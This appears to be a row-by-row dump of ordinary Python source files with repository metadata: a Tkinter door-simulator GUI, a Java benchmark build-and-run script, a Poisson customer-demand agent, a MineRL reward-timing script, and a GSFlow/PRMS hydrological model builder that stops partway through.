self.canvas.create_text(x - r - 2, y, anchor='e', text = 'O:0/3', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'CLOSE', fill=self.default_bg)
x = sx + ((ex - sx) / 2)
y = sy + 15 + (3 * (ey - sy) / 4)
self.ajar_ind = self.canvas.create_oval(x-r, y-r, x+r, y+r, outline=self.default_fg, fill=self.low_color)
self.canvas.create_text(x - r - 2, y, anchor='e', text = 'O:0/4', fill=self.default_bg)
self.canvas.create_text(x + r + 2, y, anchor='w', text = 'AJAR', fill=self.default_bg)
self.canvas.pack()
def normal_speed_clk(self):
self.doorsim.time_scale = 1.0
def double_speed_clk(self):
self.doorsim.time_scale = 2.0
def quad_speed_clk(self):
self.doorsim.time_scale = 4.0
def setup_bottom_frame(self):
frame = tk.Frame(self, width=self.default_width, height=80)
self.config_frame(frame)
frame.grid(row = 1, column=0, columnspan=1, rowspan=1)
self.normal_speed = tk.Button(frame, text='x1 Speed', command=self.normal_speed_clk)
self.config_btn(self.normal_speed)
self.normal_speed.place(relx=0.10, rely=0.5, anchor=tk.CENTER)
self.quad_speed = tk.Button(frame, text='x4 Speed', command=self.quad_speed_clk)
self.config_btn(self.quad_speed)
self.quad_speed.place(relx=0.280, rely=0.5, anchor=tk.CENTER)
self.ccrCanvas = tk.Canvas(frame, bg=self.default_bg, width=77,height=77, bd=0, highlightthickness=0, relief='ridge')
self.ccrCanvas.place(relx=0.5, rely=0.5, anchor=tk.CENTER)
img = Image.open('./images/ccr_logo.png').resize((77, 77), Image.ANTIALIAS)
self.ccrImage = ImageTk.PhotoImage(img)
self.ccrCanvas.create_image(0,0,image=self.ccrImage,anchor="nw")
self.logoCanvas = tk.Canvas(frame, bg=self.default_bg, width=180,height=77, bd=0, highlightthickness=0, relief='ridge')
self.logoCanvas.place(relx=0.680, rely=0.5, anchor=tk.CENTER)
self.logoImage = ImageTk.PhotoImage(file='./images/afit_logo.png')
self.logoCanvas.create_image(0,0,image=self.logoImage,anchor="nw")
self.quit = tk.Button(frame, text='Back', command=self.clean_up)
self.config_btn(self.quit)
self.quit.place(relx=0.9, rely=0.5, anchor=tk.CENTER)
def create_widgets(self):
self.master.minsize(width=self.default_width, height=self.default_height)
self.master.maxsize(width=self.default_width, height=self.default_height)
self.setup_frame1()
self.setup_bottom_frame()
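A launch sketch (not in the original file); Door spawns its own worker threads, so it only needs a Tk root and the main loop, and it expects the repo's images/ assets to be present. The colors below are placeholders:

if __name__ == '__main__':
    root = tk.Tk()
    app = Door(master=root, default_bg='#293134', default_fg='#E0E2E4')
    root.mainloop()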
| 28.012894
| 138
| 0.646499
| 3,018
| 19,553
| 4.054672
| 0.10603
| 0.080902
| 0.060145
| 0.054915
| 0.626706
| 0.588461
| 0.520879
| 0.476342
| 0.423143
| 0.39781
| 0
| 0.033263
| 0.205084
| 19,553
| 697
| 139
| 28.053085
| 0.754037
| 0.066384
| 0
| 0.259947
| 0
| 0
| 0.034856
| 0.002375
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066313
| false
| 0
| 0.026525
| 0
| 0.098143
| 0.005305
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9a1e099a815ae4cb966de4d518a0c2e63b69ddd
| 1,925
|
py
|
Python
|
java/run.py
|
foxtrotzulu94/LanguageBenchmarkGame
|
29c92c47c860d426409047a8408eaa52284a0cff
|
[
"MIT"
] | null | null | null |
java/run.py
|
foxtrotzulu94/LanguageBenchmarkGame
|
29c92c47c860d426409047a8408eaa52284a0cff
|
[
"MIT"
] | null | null | null |
java/run.py
|
foxtrotzulu94/LanguageBenchmarkGame
|
29c92c47c860d426409047a8408eaa52284a0cff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python

output_name = './build/libs/java.jar'

def setup():
    import os, datetime, subprocess
    if os.path.exists(os.path.join(os.getcwd(), "setup.log")):
        print("'setup.log' exists. Java implementation setup correctly")
        return
    print("Watch for Errors - Requires Java SDK and Runtime")
    try:
        with open('setup.log', 'w') as logFile:
            logFile.write("# This is an autogenerated file made by 'run.py' on {}\n".format(datetime.datetime.now()))
            logFile.write("# => DO NOT DELETE THIS FILE OR SETUP WILL BE CALLED AGAIN\n")
            logFile.flush()
            subprocess.run(["javac", "-version"], stdout=logFile, stderr=logFile, check=True)
            subprocess.run(["gradle", "-v"], stdout=logFile, stderr=logFile, check=True)
            subprocess.run(["java", "-version"], stdout=logFile, stderr=logFile, check=True)
            logFile.flush()
            logFile.write("\n# Setup completed on {}".format(datetime.datetime.now()))
        #end logFile
    except Exception as e:
        print(e)
        if os.path.exists('setup.log'):
            os.remove('setup.log')
#end run

def build():
    import os, subprocess
    # Use gradle's '--no-daemon' option to avoid keeping a process up that can interfere with our tests.
    retcode = subprocess.call(["gradle", "fullBuild", "--no-daemon"])
    if retcode != 0:
        raise AssertionError("Build failed")
    print("Built Java implementation as {}".format(output_name))
#end run

def run(cmd_args):
    import subprocess
    retcode = subprocess.call(["java", "-jar", output_name] + cmd_args)
    if retcode != 0:
        raise RuntimeError("Program run returned non-zero exit code")
#end run

if __name__ == "__main__":
    import sys, os
    setup()
    build()
    if os.path.basename(sys.argv[0]) == os.path.basename(__file__):
        run(sys.argv[1:])
# end main
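Invocation note (an assumption, not from the file): any extra command-line arguments are forwarded to the built jar, e.g. python run.py input_a.txt input_b.txt.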
| 34.375
| 117
| 0.61974
| 249
| 1,925
| 4.722892
| 0.457831
| 0.02551
| 0.020408
| 0.066327
| 0.123299
| 0.123299
| 0.123299
| 0.081633
| 0
| 0
| 0
| 0.002716
| 0.234805
| 1,925
| 55
| 118
| 35
| 0.795655
| 0.083117
| 0
| 0.105263
| 0
| 0
| 0.261092
| 0.011945
| 0
| 0
| 0
| 0
| 0.026316
| 1
| 0.078947
| false
| 0
| 0.105263
| 0
| 0.210526
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9a91a5cf9ffb0b7d6c657ce1005cb03ff51c2eb
| 1,784
|
py
|
Python
|
src/scse/modules/customer/demo_newsvendor_poisson_customer_order.py
|
bellmast/supply-chain-simulation-environment
|
af797c1d057e216184727fdd934ebd372d90f4d5
|
[
"Apache-2.0"
] | 26
|
2021-06-23T00:58:25.000Z
|
2022-03-29T19:41:18.000Z
|
src/scse/modules/customer/demo_newsvendor_poisson_customer_order.py
|
bellmast/supply-chain-simulation-environment
|
af797c1d057e216184727fdd934ebd372d90f4d5
|
[
"Apache-2.0"
] | null | null | null |
src/scse/modules/customer/demo_newsvendor_poisson_customer_order.py
|
bellmast/supply-chain-simulation-environment
|
af797c1d057e216184727fdd934ebd372d90f4d5
|
[
"Apache-2.0"
] | 13
|
2021-06-23T09:16:38.000Z
|
2022-03-22T20:01:19.000Z
|
"""
An agent representing the (retail) customer behavior following a Poisson distribution for demand.
"""
import networkx as nx
from scse.api.module import Agent
import numpy as np
import logging
logger = logging.getLogger(__name__)
class PoissonCustomerOrder(Agent):
_DEFAULT_MAX_MEAN = 10
def __init__(self, run_parameters):
simulation_seed = run_parameters['simulation_seed']
self._rng = np.random.RandomState(simulation_seed)
self._max_mean = run_parameters.get('customer_max_mean',
self._DEFAULT_MAX_MEAN)
self._DEFAULT_NEWSVENDOR_CUSTOMER = 'Customer'
def get_name(self):
return 'order_generator'
def reset(self, context, state):
self._asin_list = context['asin_list']
def compute_actions(self, state):
# There are two modes of operation: (a) simulates the ASIN selection itself, (b) simulates
# for a requested set of ASINs. This is defined in the context.
actions = []
for asin in self._asin_list:
# Generate demand from poisson distribution with mean in range [0, max]
mean_demand = self._rng.rand() * self._max_mean
demand_realization = round(max(1, self._rng.poisson(mean_demand)))
action = {
'type': 'customer_order',
'asin': asin,
'origin': None,
'destination': self._DEFAULT_NEWSVENDOR_CUSTOMER,
'quantity': demand_realization,
'schedule': state['clock']
}
logger.debug("{} bought {} units of {}.".format(
self._DEFAULT_NEWSVENDOR_CUSTOMER, demand_realization, asin))
actions.append(action)
return actions
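A usage sketch (not in the original file); the context and state dicts below are minimal stand-ins for what the simulation environment supplies:

agent = PoissonCustomerOrder({'simulation_seed': 42})
agent.reset(context={'asin_list': ['asin-1', 'asin-2']}, state=None)
orders = agent.compute_actions({'clock': 0})
print(orders)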
| 35.68
| 98
| 0.623318
| 198
| 1,784
| 5.353535
| 0.469697
| 0.039623
| 0.059434
| 0.082075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003152
| 0.288677
| 1,784
| 49
| 99
| 36.408163
| 0.832151
| 0.178812
| 0
| 0
| 0
| 0
| 0.102406
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0.029412
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ab0ef6affb1be12f6d367b89eb7c08b1fd954b
| 2,340
|
py
|
Python
|
time_to_get_rewards.py
|
GJuceviciute/MineRL-2020
|
095ca6598b6a58120dcc5dcee05c995fc58d540a
|
[
"MIT"
] | 4
|
2021-03-23T21:12:57.000Z
|
2021-07-03T16:22:01.000Z
|
time_to_get_rewards.py
|
GJuceviciute/MineRL-2020
|
095ca6598b6a58120dcc5dcee05c995fc58d540a
|
[
"MIT"
] | null | null | null |
time_to_get_rewards.py
|
GJuceviciute/MineRL-2020
|
095ca6598b6a58120dcc5dcee05c995fc58d540a
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
from utils import MINERL_DATA_ROOT, CUMULATIVE_REWARDS
import sys
import pandas


def time_to_rewards(data_set, trajectory):
    """
    Takes a data_set and a trajectory, and returns times (in ticks) to achieve each cumulative reward (from the last
    cumulative reward, not from start).
    :param data_set: data set name (for example: 'MineRLObtainDiamond-v0')
    :param trajectory: trajectory path
    :return: a list of times to achieve cumulative rewards
    """
    doc = os.path.join(MINERL_DATA_ROOT, data_set, trajectory, 'rendered.npz')
    f = np.load(doc)
    rewards = list(f['reward'])
    times = []
    c = 0
    sum_rew = 0
    for i in range(len(rewards)):
        while rewards[i] + sum_rew >= CUMULATIVE_REWARDS[c]:
            times.append(i)
            c += 1
        sum_rew += rewards[i]
    time_periods = [times[i] - times[i - 1] for i in range(1, len(times))]
    return time_periods


def main():
    if len(sys.argv) > 1:
        data_set = sys.argv[1]
    else:
        data_set = 'MineRLObtainDiamond-v0'
    path = os.path.join(MINERL_DATA_ROOT, data_set)
    trajectories = os.listdir(path)
    trajectories.sort()
    trajectory_times = []
    for trajectory in trajectories:
        time_periods = time_to_rewards(data_set, trajectory)
        trajectory_times.append(time_periods)
    reward_times = [[] for _ in range(len(CUMULATIVE_REWARDS[1:-1]))]
    for times in trajectory_times:
        for i in range(len(times)):
            reward_times[i].append(times[i])
    reward_times = [sorted(i) for i in reward_times]
    mean = [0] + [sum(i) // len(i) for i in reward_times if len(i) > 0]
    median = [0] + [i[len(i) // 2] for i in reward_times if len(i) > 0]
    counts = [len(trajectories)] + [len(i) for i in reward_times if len(i) > 0]
    d = {'mean': {}, 'median': {}, 'counts': {}}
    for i in range(len(mean)):
        d['mean'][CUMULATIVE_REWARDS[i]] = mean[i]
        d['median'][CUMULATIVE_REWARDS[i]] = median[i]
        d['counts'][CUMULATIVE_REWARDS[i]] = counts[i]
    print('\ntimes to achieve cumulative rewards(in ticks) and number of trajectories that achieve them')
    print(pandas.DataFrame.from_dict(d, orient='index').to_string())


if __name__ == "__main__":
    main()
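Invocation note (an assumption, not from the file): pass a data set name to override the MineRLObtainDiamond-v0 default, e.g. python time_to_get_rewards.py MineRLObtainIronPickaxe-v0; MINERL_DATA_ROOT must point at the downloaded MineRL data.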
| 34.925373
| 117
| 0.624359
| 330
| 2,340
| 4.269697
| 0.251515
| 0.044713
| 0.034067
| 0.031228
| 0.185947
| 0.156139
| 0.100781
| 0.100781
| 0.056778
| 0.039745
| 0
| 0.009692
| 0.250427
| 2,340
| 66
| 118
| 35.454545
| 0.793615
| 0.132051
| 0
| 0
| 0
| 0
| 0.091568
| 0.011381
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.104167
| 0
| 0.166667
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9abcbc9f24259365718e0b6fb124db1e9b1a358
| 30,988
|
py
|
Python
|
gsflow_prep/gsflow_model_prep.py
|
dgketchum/MT_RSense
|
0048c1ccb1ff6e48bd630edd477f95ae29fea06d
|
[
"Apache-2.0"
] | null | null | null |
gsflow_prep/gsflow_model_prep.py
|
dgketchum/MT_RSense
|
0048c1ccb1ff6e48bd630edd477f95ae29fea06d
|
[
"Apache-2.0"
] | null | null | null |
gsflow_prep/gsflow_model_prep.py
|
dgketchum/MT_RSense
|
0048c1ccb1ff6e48bd630edd477f95ae29fea06d
|
[
"Apache-2.0"
] | null | null | null |
import os
import json
from copy import copy
from subprocess import call, Popen, PIPE, STDOUT
import time
import numpy as np
import pandas as pd
from pyproj import Transformer
import rasterio
import fiona
from affine import Affine
from shapely.geometry import shape
from scipy.ndimage.morphology import binary_erosion
from pandas.plotting import register_matplotlib_converters
import matplotlib
import matplotlib.pyplot as plt
import flopy
from flopy.utils import GridIntersect
import richdem as rd
from gsflow.builder import GenerateFishnet, FlowAccumulation, PrmsBuilder, ControlFileBuilder
from gsflow.builder.builder_defaults import ControlFileDefaults
from gsflow.builder import builder_utils as bu
from gsflow.prms.prms_parameter import ParameterRecord
from gsflow.prms import PrmsData, PrmsParameters
from gsflow.control import ControlFile
from gsflow.output import StatVar
from model_config import PRMSConfig
from gsflow_prep import PRMS_NOT_REQ
from datafile import write_basin_datafile
register_matplotlib_converters()
pd.options.mode.chained_assignment = None
# RichDEM flow-direction coordinate system:
# 234
# 105
# 876
d8_map = {5: 1, 6: 2, 7: 4, 8: 8, 1: 16, 2: 32, 3: 64, 4: 128}
class StandardPrmsBuild(object):
def __init__(self, config):
self.cfg = PRMSConfig(config)
self.res = float(self.cfg.hru_cellsize)
self.proj_name_res = '{}_{}'.format(self.cfg.project_name,
self.cfg.hru_cellsize)
for folder in ['hru_folder', 'parameter_folder', 'control_folder', 'data_folder', 'output_folder']:
folder_path = os.path.join(self.cfg.project_folder,
self.proj_name_res,
getattr(self.cfg, folder))
setattr(self.cfg, folder, folder_path)
if not os.path.isdir(folder_path):
os.makedirs(folder_path, exist_ok=True)
self.parameters = None
self.control = None
self.data = None
self.zeros = None
with fiona.open(self.cfg.study_area_path, 'r') as src:
self.raster_meta = src.meta
self.basin_geo = [shape(f['geometry']) for f in src][0]
self.prj = self.cfg.study_area_path.replace('.shp', '.prj')
self.control_file = os.path.join(self.cfg.control_folder,
'{}.control'.format(self.proj_name_res))
self.parameter_file = os.path.join(self.cfg.parameter_folder,
'{}.params'.format(self.proj_name_res))
self.data_file = os.path.join(self.cfg.data_folder, '{}.data'.format(self.proj_name_res))
def write_parameter_file(self):
builder = PrmsBuilder(
self.streams,
self.cascades,
self.modelgrid,
self.dem.ravel(),
hru_type=self.hru_lakeless.ravel(),
hru_subbasin=self.hru_lakeless.ravel())
self.parameters = builder.build()
self.parameters.hru_lat = self.lat
self.parameters.hru_lon = self.lon
self.parameters.add_record_object(ParameterRecord('hru_x',
np.array(self.modelgrid.xcellcenters.ravel(),
dtype=float).ravel(),
dimensions=[['nhru', len(self.lon)]],
datatype=2))
self.parameters.add_record_object(ParameterRecord('hru_y',
np.array(self.modelgrid.ycellcenters.ravel(),
dtype=float).ravel(),
dimensions=[['nhru', len(self.lat)]],
datatype=2))
areas = np.ones_like(self.lat) * self.hru_area
self.parameters.add_record_object(ParameterRecord('hru_area',
np.array(areas, dtype=float).ravel(),
dimensions=[['nhru', len(self.lat)]],
datatype=2))
# self.build_lakes()
self._build_veg_params()
self._build_soil_params()
[self.parameters.add_record_object(rec) for rec in self.data_params]
[self.parameters.remove_record(rec) for rec in PRMS_NOT_REQ]
self.parameters.write(self.parameter_file)
def write_control_file(self):
controlbuild = ControlFileBuilder(ControlFileDefaults())
self.control = controlbuild.build(name='{}.control'.format(self.proj_name_res),
parameter_obj=self.parameters)
self.control.model_mode = ['PRMS']
self.control.executable_desc = ['PRMS Model']
self.control.executable_model = [self.cfg.prms_exe]
self.control.cascadegw_flag = [0]
self.control.et_module = ['potet_jh']
self.control.precip_module = ['xyz_dist']
self.control.temp_module = ['xyz_dist']
self.control.solrad_module = ['ccsolrad']
self.control.rpt_days = [7]
self.control.snarea_curve_flag = [0]
self.control.soilzone_aet_flag = [0]
self.control.srunoff_module = ['srunoff_smidx']
# 0: standard; 1: SI/metric
units = 0
self.control.add_record('elev_units', [units])
self.control.add_record('precip_units', [units])
self.control.add_record('temp_units', [units])
self.control.add_record('runoff_units', [units])
self.control.start_time = [int(d) for d in self.cfg.start_time.split(',')] + [0, 0, 0]
self.control.subbasin_flag = [0]
self.control.transp_module = ['transp_tindex']
self.control.csv_output_file = [os.path.join(self.cfg.output_folder, 'output.csv')]
self.control.param_file = [self.parameter_file]
self.control.subbasin_flag = [0, ]
self.control.parameter_check_flag = [0, ]
self.control.add_record('end_time', [int(d) for d in self.cfg.end_time.split(',')] + [0, 0, 0])
self.control.add_record('model_output_file', [os.path.join(self.cfg.output_folder, 'output.model')],
datatype=4)
self.control.add_record('var_init_file', [os.path.join(self.cfg.output_folder, 'init.csv')],
datatype=4)
self.control.add_record('data_file', [self.data_file], datatype=4)
stat_vars = ['runoff',
'basin_tmin',
'basin_tmax',
'basin_ppt',
'basin_rain',
'basin_snow',
'basin_potsw',
'basin_potet',
'basin_net_ppt',
'basin_intcp_stor',
'basin_pweqv',
'basin_snowmelt',
'basin_snowcov',
'basin_sroff',
'basin_hortonian',
'basin_infil',
'basin_soil_moist',
'basin_recharge',
'basin_actet',
'basin_gwstor',
'basin_gwflow',
'basin_gwsink',
'basin_cfs',
'basin_ssflow',
'basin_imperv_stor',
'basin_lake_stor',
'basin_ssstor']
self.control.add_record('statsON_OFF', values=[1], datatype=1)
self.control.add_record('nstatVars', values=[len(stat_vars)], datatype=1)
self.control.add_record('statVar_element', values=['1' for _ in stat_vars], datatype=4)
self.control.add_record('statVar_names', values=stat_vars, datatype=4)
self.control.add_record('stat_var_file', [os.path.join(self.cfg.output_folder, 'statvar.out')],
datatype=4)
disp_vars = [('basin_cfs', '1'),
('runoff', '1'),
('basin_gwflow', '2'),
('basin_sroff', '2'),
('basin_ssflow', '2'),
('basin_actet', '3'),
('basin_potet', '3'),
('basin_perv_et', '3'),
('basin_pweqv', '4'),
('basin_snow', '4'),
('basin_snowdepth', '4'),
('basin_snowmelt', '4')]
self.control.add_record('dispVar_plot', values=[e[1] for e in disp_vars], datatype=4)
self.control.add_record('statVar_names', values=stat_vars, datatype=4)
self.control.add_record('dispVar_element', values=['1' for _ in disp_vars], datatype=4)
self.control.add_record('gwr_swale_flag', [1])
# remove gsflow control objects
self.control.remove_record('gsflow_output_file')
self.control.write(self.control_file)
def write_datafile(self, units='metric'):
self.nmonths = 12
ghcn = self.cfg.prms_data_ghcn
stations = self.cfg.prms_data_stations
gages = self.cfg.prms_data_gages
with open(stations, 'r') as js:
sta_meta = json.load(js)
sta_iter = sorted([(v['zone'], v) for k, v in sta_meta.items()], key=lambda x: x[0])
tsta_elev, tsta_nuse, tsta_x, tsta_y, psta_elev = [], [], [], [], []
for _, val in sta_iter:
if units != 'metric':
elev = val['elev'] / 0.3048
else:
elev = val['elev']
tsta_elev.append(elev)
tsta_nuse.append(1)
tsta_x.append(val['proj_coords'][1])
tsta_y.append(val['proj_coords'][0])
psta_elev.append(elev)
self.data_params = [ParameterRecord('nrain', values=[len(tsta_x)], datatype=1),
ParameterRecord('ntemp', values=[len(tsta_x)], datatype=1),
ParameterRecord('psta_elev', np.array(psta_elev, dtype=float).ravel(),
dimensions=[['nrain', len(psta_elev)]], datatype=2),
ParameterRecord('psta_nuse', np.array(tsta_nuse, dtype=int).ravel(),
dimensions=[['nrain', len(tsta_nuse)]], datatype=1),
ParameterRecord(name='ndist_psta', values=[len(tsta_nuse), ], datatype=1),
ParameterRecord('psta_x', np.array(tsta_x, dtype=float).ravel(),
dimensions=[['nrain', len(tsta_x)]], datatype=2),
ParameterRecord('psta_y', np.array(tsta_y, dtype=float).ravel(),
dimensions=[['nrain', len(tsta_y)]], datatype=2),
ParameterRecord('tsta_elev', np.array(tsta_elev, dtype=float).ravel(),
dimensions=[['ntemp', len(tsta_elev)]], datatype=2),
ParameterRecord('tsta_nuse', np.array(tsta_nuse, dtype=int).ravel(),
dimensions=[['ntemp', len(tsta_nuse)]], datatype=1),
ParameterRecord(name='ndist_tsta', values=[len(tsta_nuse), ], datatype=1),
ParameterRecord('tsta_x', np.array(tsta_x, dtype=float).ravel(),
dimensions=[['ntemp', len(tsta_x)]], datatype=2),
ParameterRecord('tsta_y', np.array(tsta_y, dtype=float).ravel(),
dimensions=[['ntemp', len(tsta_y)]], datatype=2),
bu.tmax_adj(self.nhru),
bu.tmin_adj(self.nhru),
ParameterRecord(name='nobs', values=[1, ], datatype=1),
]
outlet_sta = self.modelgrid.intersect(self.pour_pt[0][0], self.pour_pt[0][1])
outlet_sta = self.modelgrid.get_node([(0,) + outlet_sta])
self.data_params.append(ParameterRecord('outlet_sta',
values=[outlet_sta[0] + 1, ],
dimensions=[['one', 1]],
datatype=1))
if units == 'metric':
allrain_max = np.ones((self.nhru * self.nmonths)) * 3.3
tmax_allrain = np.ones((self.nhru * self.nmonths)) * 3.3
tmax_allsnow = np.ones((self.nhru * self.nmonths)) * 0.0
else:
allrain_max = np.ones((self.nhru * self.nmonths)) * 38.0
tmax_allrain = np.ones((self.nhru * self.nmonths)) * 38.0
tmax_allsnow = np.ones((self.nhru * self.nmonths)) * 32.0
self.data_params.append(ParameterRecord('tmax_allrain_sta', allrain_max,
dimensions=[['nhru', self.nhru], ['nmonths', self.nmonths]],
datatype=2))
self.data_params.append(ParameterRecord('tmax_allrain', tmax_allrain,
dimensions=[['nhru', self.nhru], ['nmonths', self.nmonths]],
datatype=2))
self.data_params.append(ParameterRecord('tmax_allsnow', tmax_allsnow,
dimensions=[['nhru', self.nhru], ['nmonths', self.nmonths]],
datatype=2))
self.data_params.append(ParameterRecord('snowpack_init',
np.ones_like(self.ksat).ravel(),
dimensions=[['nhru', self.nhru]],
datatype=2))
if not os.path.isfile(self.data_file):
write_basin_datafile(station_json=stations,
gage_json=gages,
ghcn_data=ghcn,
out_csv=None,
data_file=self.data_file,
units=units)
self.data = PrmsData.load_from_file(self.data_file)
def build_model_files(self):
self._build_grid()
self.write_datafile(units='standard')
self.write_parameter_file()
self.write_control_file()
def write_raster_params(self, name, values=None):
out_dir = os.path.join(self.cfg.raster_folder, 'resamples', self.cfg.hru_cellsize)
if not isinstance(values, np.ndarray):
values = self.parameters.get_values(name).reshape((self.modelgrid.nrow, self.modelgrid.ncol))
_file = os.path.join(out_dir, '{}.tif'.format(name))
with rasterio.open(_file, 'w', **self.raster_meta) as dst:
dst.write(values, 1)
def _build_grid(self):
with fiona.open(self.cfg.study_area_path, 'r') as domain:
geo = [f['geometry'] for f in domain][0]
geo = shape(geo)
self.bounds = geo.bounds
self.modelgrid = GenerateFishnet(bbox=self.cfg.elevation,
xcellsize=float(self.cfg.hru_cellsize),
ycellsize=float(self.cfg.hru_cellsize))
self.fishnet_file = os.path.join(self.cfg.hru_folder, 'fishnet.shp')
self.modelgrid.write_shapefile(self.fishnet_file, prj=self.prj)
self._prepare_rasters()
x = self.modelgrid.xcellcenters.ravel()
y = self.modelgrid.ycellcenters.ravel()
self.nhru = (x * y).size
self.hru_area = (float(self.cfg.hru_cellsize) ** 2) * 0.000247105
trans = Transformer.from_proj('epsg:{}'.format(5071), 'epsg:4326', always_xy=True)
self.lon, self.lat = trans.transform(x, y)
self.zeros = np.zeros((self.modelgrid.nrow, self.modelgrid.ncol))
self.nnodes = self.zeros.size
self._build_domain_params()
self._build_terrain_params(mode='richdem')
def _build_terrain_params(self, mode='pygsflow'):
"""This method computes flow accumulation/direction rasters for both
RichDEM and PyGSFLOW. RichDEM seems to fill depressions more effectively and is fast."""
self.dem = rd.LoadGDAL(self.cfg.elevation, no_data=0.0)
if np.any(self.dem == 0.0):
for r in range(self.dem.shape[0]):
d = self.dem[r, :].ravel()
idx = np.arange(len(d))
self.dem[r, :] = np.interp(idx, idx[d > 0.0], d[d > 0.0])
if mode == 'richdem':
# RichDEM flow accumulation and direction
rd.FillDepressions(self.dem, epsilon=0.0001, in_place=True)
self.dem = rd.rdarray(self.dem, no_data=0, dtype=float)
rd_flow_accumulation = rd.FlowAccumulation(self.dem, method='D8')
props = rd.FlowProportions(dem=self.dem, method='D8')
# remap directions to pygsflow nomenclature
dirs = np.ones_like(rd_flow_accumulation)
for i in range(1, 9):
dirs = np.where(props[:, :, i] == 1, np.ones_like(dirs) * i, dirs)
rd_flow_directions = copy(dirs)
for k, v in d8_map.items():
rd_flow_directions[dirs == k] = v
# manually flow corners and edges inward
rd_flow_directions[0, 0] = 2
rd_flow_directions[0, -1] = 8
rd_flow_directions[-1, 0] = 128
rd_flow_directions[-1, -1] = 32
rd_flow_directions[0, 1:-1] = 4
rd_flow_directions[1:-1, 0] = 1
rd_flow_directions[1:-1, -1] = 16
rd_flow_directions[-1, 1:-1] = 64
self.flow_direction = rd_flow_directions
self.flow_accumulation = rd_flow_accumulation
elif mode == 'pygsflow':
# pygsflow flow accumulation and direction
fa = FlowAccumulation(self.dem,
self.modelgrid.xcellcenters,
self.modelgrid.ycellcenters,
verbose=False)
self.flow_direction = fa.flow_directions(dijkstra=True, breach=0.001)
self.flow_accumulation = fa.flow_accumulation()
else:
raise NotImplementedError('Must choose between "pygsflow" and "richdem" for '
'flow calculations')
fa = FlowAccumulation(
self.dem,
self.modelgrid.xcellcenters,
self.modelgrid.ycellcenters,
hru_type=self.hru_lakeless,
flow_dir_array=self.flow_direction,
verbose=False)
self.watershed = fa.define_watershed(self.pour_pt,
self.modelgrid,
fmt='xy')
self.streams = fa.make_streams(self.flow_direction,
self.flow_accumulation,
threshold=100,
min_stream_len=10)
self.cascades = fa.get_cascades(streams=self.streams,
pour_point=self.pour_pt, fmt='xy',
modelgrid=self.modelgrid)
self.hru_aspect = bu.d8_to_hru_aspect(self.flow_direction)
self.hru_slope = bu.d8_to_hru_slope(self.flow_direction,
self.dem,
self.modelgrid.xcellcenters,
self.modelgrid.ycellcenters)
def _build_domain_params(self):
ix = GridIntersect(self.modelgrid, method='vertex', rtree=True)
shape_input = [('outlet', 'model_outlet_path'),
('lake_id', 'lake_path'),
('hru_type', 'study_area_path')]
for param, path in shape_input:
shp_file = getattr(self.cfg, path)
feats = features(shp_file)
data = copy(self.zeros)
for i, f in enumerate(feats, start=1):
geo = shape(f['geometry'])
idx = ix.intersects(geo)
for x in idx:
data[x[0]] = i
outfile = os.path.join(self.cfg.hru_folder, '{}.txt'.format(param))
if param == 'outlet':
setattr(self, 'pour_pt', [[geo.x, geo.y]])
if param == 'hru_type':
erode = binary_erosion(data)
border = erode < data
setattr(self, 'border', border)
lakeless = np.where(border, self.zeros + 3, data)
setattr(self, 'hru_lakeless', lakeless)
data = np.where(self.lake_id > 0, self.zeros + 2, data)
setattr(self, param, data)
np.savetxt(outfile, data, delimiter=' ')
def _build_lakes(self):
lakes = bu.lake_hru_id(self.lake_id)
nlake = ParameterRecord(
            name='nlake', values=[np.unique(self.lake_id).size], datatype=1, file_name=None  # count of lake ids, not the array itself
)
nlake_hrus = ParameterRecord(
name='nlake_hrus', values=[np.count_nonzero(self.lake_id)], datatype=1, file_name=None
)
[self.parameters.add_record_object(l) for l in [lakes, nlake, nlake_hrus]]
def _build_veg_params(self):
self._prepare_lookups()
covtype = bu.covtype(self.landfire_type, self.covtype_lut)
covden_sum = bu.covden_sum(self.landfire_cover, self.covdensum_lut)
covden_win = bu.covden_win(covtype.values, self.covdenwin_lut)
rad_trncf = bu.rad_trncf(covden_win.values)
snow_intcp = bu.snow_intcp(self.landfire_type, self.snow_intcp_lut)
srain_intcp = bu.srain_intcp(self.landfire_type, self.srain_intcp_lut)
wrain_intcp = bu.wrain_intcp(self.landfire_type, self.snow_intcp_lut)
vars_ = [covtype, covden_sum, covden_win, rad_trncf, snow_intcp, srain_intcp,
wrain_intcp]
for v in vars_:
self.parameters.add_record_object(v)
self.root_depth = bu.root_depth(self.landfire_type, self.rtdepth_lut)
def _build_soil_params(self):
cellsize = int(self.cfg.hru_cellsize)
soil_type = bu.soil_type(self.clay, self.sand)
# awc meters to inches
self.awc = self.awc * 1000 / 25.4
soil_moist_max = bu.soil_moist_max(self.awc, self.root_depth)
soil_moist_init = bu.soil_moist_init(soil_moist_max.values)
soil_rech_max = bu.soil_rech_max(self.awc, self.root_depth)
